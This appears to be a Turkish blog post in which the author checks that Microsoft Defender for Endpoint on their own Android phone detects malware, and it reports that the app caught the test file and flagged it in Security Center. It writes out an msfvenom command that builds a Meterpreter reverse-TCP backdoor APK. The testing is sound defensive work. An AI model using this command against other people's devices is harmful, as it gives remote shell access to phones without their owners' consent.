Microsoft Defender Endpoint Android Bir Cihazda Zararlı Yazılım Testi
Mobil telefonumda genellikle bir uygulama indireceğim zaman asla kaynağını bilmediğim bir yerden uygulama indirmiyorum. Bundan ötürü Microsoft Defender Endpoint uygulamam hiç uyarı vermedi bende bunun üzerine şüphelendim, acaba uygulama çalışmıyor mu diye bunun üzerine Android cihazımda bulunan Microsoft Defender Endpoint uygulamamı test etmek istedim. Bunun sonucunu sizlerle paylaşmak istedim. İsterseniz birlikte neler yaptığımızı sırasıyla görelim.
msfvenom -p android/meterpreter/reverse_tcp LHOST=172.19.100.255 LPORT=4444 -o endpoint.apkKali Linux cihazımda bir zararlı yazılım oluşturmak için msfvenom aracını kullanarak ufak bir zararlı oluşturdum. Eğer her şey yolundan giderse android cihazımdan bir terminal bağlantısı alarak cihazıma erişim sağlayacağım eğer yapamazsam bilin ki endpoint uygulamam çalışıyor demektir. Öncelikle yukarıda ki script kullanarak .apk uzantılı bir backdoor oluşturuyorum. Bu zararlıyı bir web sitesine atarak cihazıma indireceğim.
Telefonumun web tarayıcısından zararlıyı indirebileceğim linke gidiyorum. Zararlıyı indiriyorum.Allah ne verdiyse kabul ediyorum.
Evet Microsoft Defender Endpoint uygulamam android cihazım üzerinde zararlı yazılımı yakaladı ve kaldırmamı istiyor.
Kaldırdıktan sonra ortam temizlenmiş durumdadır.
Security Center üzerinden android cihazımı kontrol ettiğimde cihazımda ki aktiviteleri görebiliyorum.
Yine alert story üzerinden zararlının ne tür aktiviteleri gerçekleştirdiğini görerek gerekli analizleri yapabiliriz.
Başka yazılarda görüşmek üzere…
